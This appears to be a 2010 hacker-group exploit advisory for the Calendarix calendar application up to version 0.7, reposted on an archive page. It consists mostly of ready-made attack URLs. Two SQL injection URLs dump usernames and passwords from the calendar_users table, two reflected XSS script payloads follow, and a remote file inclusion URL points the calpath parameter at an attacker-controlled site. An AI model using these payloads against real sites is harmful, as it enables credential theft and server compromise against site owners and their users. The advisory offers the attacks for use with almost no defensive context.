Home / os / winme

calendarix-sqlrfixss.txt

Posted on 07 January 2010

############################################################################ # _____ __ __ ___ _ _ _ # # |_ _| ___ __ _ | / | _ __ / _ (_) ___ ___ | | | # # | | / _ / _` | | |/| | | '_ | | | | | | / __| / _ | | | # # | | | __/ | (_| | | | | | | |_) | | |_| | | | \__ | (_) | | | | # # |_| \___| \__,_| |_| |_| | .__/ \___/ |_| |___/ \___/ |_| \_| # ###### |_| ###### # Calendarix <= 0.7 (multiple vulnerabilities) # # [#] Found by: TriCk aka Saywhat? # # [#] Contact: Badnews_saywhat@hotmail.com # # [#] Site: p0ison.org # ############################################################################ ============================================================================ +++++++++++++++++++ Calendarix <= 0.7 (SQL injections) +++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 http://SITE.COM/PATH/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 ============================================================================ ++++++++++++++++++++++++ Calendarix <= 0.7 (XSS) +++++++++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/calendar.php?/yearcal.php?ycyear=<script>alert('TeaMp0isoN')</script> http://SITE.COM/PATH//calendar.php?year=<script>alert('TeaMp0isoN')</script> ============================================================================ ++++++++++++++++++++++++ Calendarix <= 0.7 (RFI) +++++++++++++++++++++++++++ ============================================================================ http://SITE.COM/PATH/cal_config.inc.php?calpath= EVIL SITE??? ============================================================================ Gr33tz 2: TeaMp0isoN // Luit // Al_EPiCa // ACiD // Amarilla // p0ison.org ============================================================================ _________________________________________________________________ Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010

 

TOP